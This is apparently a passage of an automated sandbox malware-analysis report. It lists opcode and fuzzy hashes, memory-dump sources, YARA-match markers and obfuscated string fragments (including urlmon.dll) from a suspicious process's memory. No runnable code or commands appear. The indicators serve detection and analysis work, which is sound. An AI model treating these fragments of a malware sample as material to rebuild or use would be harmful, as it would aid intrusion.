                                                • Instruction ID: 98943bb6738c4faf7e2de88307eedb4b4c5bb3bada4e5a011b4dce9fca9b89ab
                                                • Opcode Fuzzy Hash: cf618fcd25cc473fcddc84176ffd31cbd3963ce1d315d77fef777b479c4743f0
                                                • Instruction Fuzzy Hash: 3C21F1B6D0121DAF9B00DF99D8418EFBBF9FF98210F04426AE915E7200E7705A558BA0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e140b92dc857c72a906da5101ca759838e82b92c7830381d4c89b6cba42f48b
                                                • Instruction ID: ea3df72dca7db055546a5dfca3de9a46eb1e4aa117fab91a963bbd9edec74224
                                                • Opcode Fuzzy Hash: 2e140b92dc857c72a906da5101ca759838e82b92c7830381d4c89b6cba42f48b
                                                • Instruction Fuzzy Hash: 231100B6D0121CAF9B40DFA9D9419EEBBF9EF88200F04455AE919E7200E7715A04CBE1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10ffc6aa865e63e40f6dd03ccdf9b007c944ae3533584ab10e39e0934b7f132a
                                                • Instruction ID: 9ad42a78347d8e280d42f3bcce652042027eccaa5542b6c6b5b695ccd01203f5
                                                • Opcode Fuzzy Hash: 10ffc6aa865e63e40f6dd03ccdf9b007c944ae3533584ab10e39e0934b7f132a
                                                • Instruction Fuzzy Hash: 040192BAA413183BD710EA64DC55DEF73ACDF95210F000295FD189B241FA70AED28BE1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b60cde32ad96e625a3901cd5830536d60fa7190b41b442b0b011c2235f44591
                                                • Instruction ID: 38738d3ee7e21611b1e82477da97228b4f4940d391be562925526398042ffd4a
                                                • Opcode Fuzzy Hash: 5b60cde32ad96e625a3901cd5830536d60fa7190b41b442b0b011c2235f44591
                                                • Instruction Fuzzy Hash: 3101D6B2201609BBCB44DE99DC80EDB77ADAF8D710F014208FA09D7241D630F851CBA4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd2916e988c7f161540edc70877dc47418bdf8b7f508e2479f27bdb52a9506d0
                                                • Instruction ID: 3a6e760823968f9cbd16c116eda21f3b752b27dc20558fdb2d5333800f547267
                                                • Opcode Fuzzy Hash: bd2916e988c7f161540edc70877dc47418bdf8b7f508e2479f27bdb52a9506d0
                                                • Instruction Fuzzy Hash: A011B3B1D21229AFCB44CFAD988459EBFF8FB48720F10865BE828E7200D37096508F94
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d591ab213f59699916673ca8ade890358cd20f12af629e45536e6f8d1b7e5dad
                                                • Instruction ID: 9dceb5358ba3f6354e5d96c328bef22fedcc57d71d5a39db0517703239d51b02
                                                • Opcode Fuzzy Hash: d591ab213f59699916673ca8ade890358cd20f12af629e45536e6f8d1b7e5dad
                                                • Instruction Fuzzy Hash: 92F0A77761021E6BD714AA6DAC80F86FB9CEB89334F240222FA1D9B351D671D46183A0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5017393e80304b80e82970dd539f71a276d3f5cebbabe2b3b40e97ad5c5fb0a
                                                • Instruction ID: 9e8034037cbc78ef4f9828c302993266a85a1e97459ed9ef48ac0ddadb568450
                                                • Opcode Fuzzy Hash: e5017393e80304b80e82970dd539f71a276d3f5cebbabe2b3b40e97ad5c5fb0a
                                                • Instruction Fuzzy Hash: FAF01C762006057BDB10EE99DC41EAB77ADEFC9610F004419FD19A7245D670B9118BB4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dc53270e81e8118875e8876ff73b5f2fe330d8af91f418a7947fd4134be5c32
                                                • Instruction ID: d35dc64f3b518a45f1ed35d3b9b457d24ece356c47c2553923ab90a976af41c5
                                                • Opcode Fuzzy Hash: 1dc53270e81e8118875e8876ff73b5f2fe330d8af91f418a7947fd4134be5c32
                                                • Instruction Fuzzy Hash: 37F036B590021569DB24FBA4DD49FAEB379DB84710F00418DB90D6B254EA7059D48B51
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                • Instruction ID: 2b3db70be7298e5155cdaedf054545ef6a3c8c934c2e03317d29f5d8d30beae8
                                                • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                • Instruction Fuzzy Hash: B8F08275C15208EBDB14DFA4D881BDEFBB8EB04360F1043ADE8259B2C0D73497608795
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 418242098c58ec91757ec449f84ce90047456cc015d02c051a4eceff550d5f82
                                                • Instruction ID: 3b142b53409c43037369b113f37da4b41e777a7fa52b3b98ecdf885e2c681c8c
                                                • Opcode Fuzzy Hash: 418242098c58ec91757ec449f84ce90047456cc015d02c051a4eceff550d5f82
                                                • Instruction Fuzzy Hash: 68E065762013147BD610EE58DC41FABB7ADEFCA710F004409FD09AB241CA71B9208BB4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 596132ecb34c59f0ddb36b9760fb0286cd8603c5f4a80a58c74a8aa198bc17a6
                                                • Instruction ID: d10c2a264e9ab451306b8e9e35778066c4eeb5c422d55e5575f68faaa6966b6c
                                                • Opcode Fuzzy Hash: 596132ecb34c59f0ddb36b9760fb0286cd8603c5f4a80a58c74a8aa198bc17a6
                                                • Instruction Fuzzy Hash: 33E0863774231437C220E59D9C05FA7B76DCBC1E60F590074FE089F344E561A94183E5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64d783b29f99dca73f5935a3eb4dc6309f6f27a9481b04ea9412a3b2e512d4fc
                                                • Instruction ID: d5a54973e96ac11d8f67a348b46ed2c2d71235c40c24fbc39b831aa0b8cebf61
                                                • Opcode Fuzzy Hash: 64d783b29f99dca73f5935a3eb4dc6309f6f27a9481b04ea9412a3b2e512d4fc
                                                • Instruction Fuzzy Hash: A0E0267340416B6EC7159A6D5C80C8BFFADEAC93343290325E4599B362D6318422C790
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d97c667bfe178a1ed9f54a9e416e185a927e75da737129d3c28d40d293dd74d
                                                • Instruction ID: 1552dfb3a99780ea1f22287cc1b9c9bc820046dcac56d84856b499268e97dacc
                                                • Opcode Fuzzy Hash: 2d97c667bfe178a1ed9f54a9e416e185a927e75da737129d3c28d40d293dd74d
                                                • Instruction Fuzzy Hash: 2EE06575815108AADB14CB74D8C1BEDBB74DB092A1F1447ADE815DB280D73587948754
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3dc6c1de3246d7d3cba71d54e37f4708369b9336210067afd53c27288663b7b
                                                • Instruction ID: a7456e10ea4a13cb41c461e9ae313231b19365bbd77de840b8856325d18e3e44
                                                • Opcode Fuzzy Hash: a3dc6c1de3246d7d3cba71d54e37f4708369b9336210067afd53c27288663b7b
                                                • Instruction Fuzzy Hash: 81E0463A2013147BC220FA69DC00F9BB76DEBC6720F008416FA0DAB241C671B91187A5
                                                Strings
                                                • String ID: #22.$#6+-$#='7$'SE]$+!#6$+-,m$,m:*$0SE]$5HS]$6'S0$6'S0$6'S0$6/.i$6SK]$:/.n$:/.y$<$EG$=6'G$?!S@$?!S@$?!SA$?00A$B$BHS$$CDAD$CDAJ$CDAJ$CHS $CHS$$CHS0$G]CS$HS]=$HS]=$HS]=$S> :$]C0Z$]C0Z$]C]@$]C]F$]F]@$rlz$s${nhm
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                • String ID: #='7$'SE]$0SE]$5HS]$6'S0$6'S0$6'S0$6SK]$<$EG$=6'G$?!S@$?!S@$?!SA$?00A$BHS$$CDAD$CDAJ$CDAJ$CHS $CHS$$CHS0$G]CS$HS]=$HS]=$HS]=$S> :$]C0Z$]C0Z$]C]@$]C]F$]F]@$s
                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                • String ID: $*$+'$+D$:$;j$=$C;$F($O$R$h$i$p3$q$r$+$O
                                                • API String ID: 0-4060930160
                                                • Opcode ID: f8fb2c3dca9aeb561290f44a117d8fb03b212ec598e33aea395f36f92aea0989
                                                • Instruction ID: 536ad083b8c2164202248524905b3388eee774b698538aedab65b0868b92f8dc
                                                • Opcode Fuzzy Hash: f8fb2c3dca9aeb561290f44a117d8fb03b212ec598e33aea395f36f92aea0989
                                                • Instruction Fuzzy Hash: 9E7158B0C05269CBFB21CF91C9987DDBBB1BB05308F1081D9C1497B291C7BA1A89CF91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #22.$#6+-$+!#6$+-,m$,m:*$.n#2$2.+!$6':6$6/.i$:/.n$:/.y$B$m*6/$rlz${nhm
                                                • API String ID: 0-199465615
                                                • Opcode ID: e388787e124abb4d239699cb131ad40dedc39f51b9a2efb198cb12fdb8da3165
                                                • Instruction ID: 704f4b095ce58642d246415ec741021995d1e7e8831239d05d1d1d57a2f991d0
                                                • Opcode Fuzzy Hash: e388787e124abb4d239699cb131ad40dedc39f51b9a2efb198cb12fdb8da3165
                                                • Instruction Fuzzy Hash: D41145B5C1530E9BCB11CFA4EA857ADBF74FB09200FA04258EA516A201D3754A06CF58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #22.$#6+-$+!#6$+-,m$,m:*$.n#2$2.+!$6':6$6/.i$:/.n$:/.y$B$m*6/$rlz${nhm
                                                • API String ID: 0-199465615
                                                • Opcode ID: eff0940a4b7afcf400868d61cb714a1f8ad63ae8e6ce4936f489ce28e807d92c
                                                • Instruction ID: f6b0e37b913fdceab2727c0068a6c2edb60f6a69b80f082fa1f688d4dd87ac8c
                                                • Opcode Fuzzy Hash: eff0940a4b7afcf400868d61cb714a1f8ad63ae8e6ce4936f489ce28e807d92c
                                                • Instruction Fuzzy Hash: 300153B0C1531D9BCB14DF95EA857DDBF34FF04240FA09258EA022A205E3755A02CF99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: 0165e0177b1e264912b305ae300c3bd55e0a01041fa16ac63b417c119b9734f5
                                                • Instruction ID: a1dd53e1e59026c3136195b94f713ecfb4cebd6f6f2f73ead2a012faa9e80761
                                                • Opcode Fuzzy Hash: 0165e0177b1e264912b305ae300c3bd55e0a01041fa16ac63b417c119b9734f5
                                                • Instruction Fuzzy Hash: 03710CB5D00318ABDB15DF94CC90FEEB7BDAF44700F408199E919AA240E7755B88CFA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: 765718b9bdaac97d69c9694484de73f3708ecebe9b089f7f37f16740d9697352
                                                • Instruction ID: c9b4eaadb7c373e2ec4ded916da2064d86e1ac70470ab977ec7e7a6c9a32406c
                                                • Opcode Fuzzy Hash: 765718b9bdaac97d69c9694484de73f3708ecebe9b089f7f37f16740d9697352
                                                • Instruction Fuzzy Hash: C4611CB5C00318ABDB15DFA4CC90FEEB7B9AF48700F404199E919AA240E7755B88CF65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                • API String ID: 0-685823316
                                                • Opcode ID: a77e78608a4c75038fc4c13ea3fde96c4ea3ed3365bda5fa76354335cba23522
                                                • Instruction ID: 61a662c1cf8b33f01f294279514e36a2481b9986d808dc77fa1ba9f9b9737cd6
                                                • Opcode Fuzzy Hash: a77e78608a4c75038fc4c13ea3fde96c4ea3ed3365bda5fa76354335cba23522
                                                • Instruction Fuzzy Hash: 9D216FB5D41318AAEB40DFA4CC45FEEBBB9AB44704F008158FA18BA180DBB516488BA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                • API String ID: 0-685823316
                                                • Opcode ID: 7a8e0b7b56b0e54f5d4444a549a954b69a7da5981da711a970eadf4bd6ee9481
                                                • Instruction ID: 7e6681b679660e46114ff9710ae6032227fd1d38e65148275358935db06dd9c9
                                                • Opcode Fuzzy Hash: 7a8e0b7b56b0e54f5d4444a549a954b69a7da5981da711a970eadf4bd6ee9481
                                                • Instruction Fuzzy Hash: 3D216DB5D51318AAEB40DFD4CC84BEEBBB9AF44704F10815DF618BA180DBB516488FA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: ad01ff0855174a00e48f4ee7f7f315d677bc6d1ae16610b168e49126fb24e581
                                                • Instruction ID: 7ff7342b67717fd756cf16368795ab764482057e50db2305c4f8d84beaecaaad
                                                • Opcode Fuzzy Hash: ad01ff0855174a00e48f4ee7f7f315d677bc6d1ae16610b168e49126fb24e581
                                                • Instruction Fuzzy Hash: 7ED1FAB6900708ABDB50DFA4CC50FEEB7B9AF88310F44851DE919DB240E778AA45CF61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: 46c1bb462336c1335b3d7cdcfb579c128b6c96930d0032d010061750064a5a9a
                                                • Instruction ID: 41ccf829a803d41c09d12a5d421219aecd6718b6e74c3037f109e902dd40994e
                                                • Opcode Fuzzy Hash: 46c1bb462336c1335b3d7cdcfb579c128b6c96930d0032d010061750064a5a9a
                                                • Instruction Fuzzy Hash: CE8107B6900308AFDB50DFA4C850FEEB7B9AF88310F44851DE519EB240E779AA45CF65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$P$e$i$m$o$r$x
                                                • API String ID: 0-620024284
                                                • Opcode ID: 6bcd80dffd18ba676cc6aa5c53d2caf8e87e2d21056555bd365f3761e66815a1
                                                • Instruction ID: dc93e1636f62f0e6bc13333d8c879e38703c439b1b9f6e0749a9172acd3e5e1a
                                                • Opcode Fuzzy Hash: 6bcd80dffd18ba676cc6aa5c53d2caf8e87e2d21056555bd365f3761e66815a1
                                                • Instruction Fuzzy Hash: 8F4163B9D003187BDB21EFA4DC50EDB777CAF95300F408599B90DAB140EAB557898FA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$P$e$i$m$o$r$x
                                                • API String ID: 0-620024284
                                                • Opcode ID: fbd7a7ea1c8676b6c7bbfaa6d49c05a784b0daad77f27131974734ef91f13155
                                                • Instruction ID: 9486a5d2f0950765adfbd9567c3cdbdd26005f747cbe0b009623588f18a4f2ec
                                                • Opcode Fuzzy Hash: fbd7a7ea1c8676b6c7bbfaa6d49c05a784b0daad77f27131974734ef91f13155
                                                • Instruction Fuzzy Hash: 644163B9D0031866DB21EFA4DC50EDB777CAF95300F408599B90DAB140EAB557898FA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$2$7$7$^$^$p$|
                                                • API String ID: 0-3056927568
                                                • Opcode ID: 158743b37979adee1e1d9a127d638bf4e5d90dff2ed699cc78d2d2c3ba0cc588
                                                • Instruction ID: 0eb4ef8dff9fc28441d6b005ff4fdba0039e3865be510f84f5d0ca313c295c44
                                                • Opcode Fuzzy Hash: 158743b37979adee1e1d9a127d638bf4e5d90dff2ed699cc78d2d2c3ba0cc588
                                                • Instruction Fuzzy Hash: D411BB50D0C7CAD9DB12C7BC84086AEBFB15F23224F0887D9D4E46B2D2D27A4706C7A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 9c2784b8046db6796b451d2035214bc31f8aad1d2d7a82a7c40f6fc9011f1246
                                                • Instruction ID: 6dea0ed7b063f236c27c8a31ad2191854a914dc788126cd66fcef58c37139eb9
                                                • Opcode Fuzzy Hash: 9c2784b8046db6796b451d2035214bc31f8aad1d2d7a82a7c40f6fc9011f1246
                                                • Instruction Fuzzy Hash: 574186B6D00318AACB10EF98DC84EEEB7F8BF48310F45955AE919AB200E77155858F90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: F$P$T$f$r$x
                                                • API String ID: 0-2523166886
                                                • Opcode ID: a6aee0fa193b127372b375979f9acb7962075c04a7853e442710165e0255d989
                                                • Instruction ID: 47332991d56c1785341cc7231966a36bb0d80cc5fa2a1bea14f9c7e5caefda5d
                                                • Opcode Fuzzy Hash: a6aee0fa193b127372b375979f9acb7962075c04a7853e442710165e0255d989
                                                • Instruction Fuzzy Hash: F45181B1900305ABE734DFA5C844FEAF7FCAF45740F04456EE4059A580E7B5AA88CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: F$P$T$f$r$x
                                                • API String ID: 0-2523166886
                                                • Opcode ID: 28bd96e8fa79b8ba49d5f3aa611aa13201be7a8b8464d3630a5a20947fcf4181
                                                • Instruction ID: 317ed49e216d0811f599dc818e11da118c2b06a33e6021c14fa8c94a136d5cfc
                                                • Opcode Fuzzy Hash: 28bd96e8fa79b8ba49d5f3aa611aa13201be7a8b8464d3630a5a20947fcf4181
                                                • Instruction Fuzzy Hash: 8001D471C002546ADB20DFA499086DFBF75FF46710F01455DD804BF714E7BA8A49CB94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $i$l$o$u
                                                • API String ID: 0-2051669658
                                                • Opcode ID: ad371dd34f994b88090aa072f6839809b16abae1d8c1c8b158e617ade026e353
                                                • Instruction ID: 2a2cbfe2451bf4a72099bc7fe167f5e36bf5296cd5c071cd12fe99b98e487e66
                                                • Opcode Fuzzy Hash: ad371dd34f994b88090aa072f6839809b16abae1d8c1c8b158e617ade026e353
                                                • Instruction Fuzzy Hash: C96130B5900308AFDB24DBA4CC80FEFB7FDAB89710F148559E55AA7240E735AA45CB60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $i$l$o$u
                                                • API String ID: 0-2051669658
                                                • Opcode ID: ade0f600eb12b801ea045f0c554a1ad1f0d8dc61adfae9331fede6af633b75c6
                                                • Instruction ID: b66a69826e8f36fbe137c1bfc5b58b7796fffee9863a4dbda92f5a931a087f60
                                                • Opcode Fuzzy Hash: ade0f600eb12b801ea045f0c554a1ad1f0d8dc61adfae9331fede6af633b75c6
                                                • Instruction Fuzzy Hash: 37411DB5900308AFDB20DFA4CC84FEFBBFDAB89704F104559E559A7240E771AA41CB60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: b45c075d37d2e9e969e2859eebfb3f6bf6851b04bb3a88e7220016b9bc5cadae
                                                • Instruction ID: 5be2e9b53a5e0323dece37c878c57347e61c479a5499b323ca8be3228915eb87
                                                • Opcode Fuzzy Hash: b45c075d37d2e9e969e2859eebfb3f6bf6851b04bb3a88e7220016b9bc5cadae
                                                • Instruction Fuzzy Hash: BDB11EB5A00304AFDB24DBE9CC85FEFB7BDAF89700F148558F6199B240D675AA41CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$h$o
                                                • API String ID: 0-3662636641
                                                • Opcode ID: 9db09ed0be048a9404982baf7a541e48607b41a7a9acad2f00647a8de2f41c28
                                                • Instruction ID: c2ef47466bd5c9a9ba4d16849d3cc15112a7849da2a663203a6a7b95f792dfa5
                                                • Opcode Fuzzy Hash: 9db09ed0be048a9404982baf7a541e48607b41a7a9acad2f00647a8de2f41c28
                                                • Instruction Fuzzy Hash: 3C81B2B6C003586ADB64EB94CC90FEF73BCEF89340F404299B50D6A144EE746B848FA5
                                                Strings
                                                Memory Dump Source
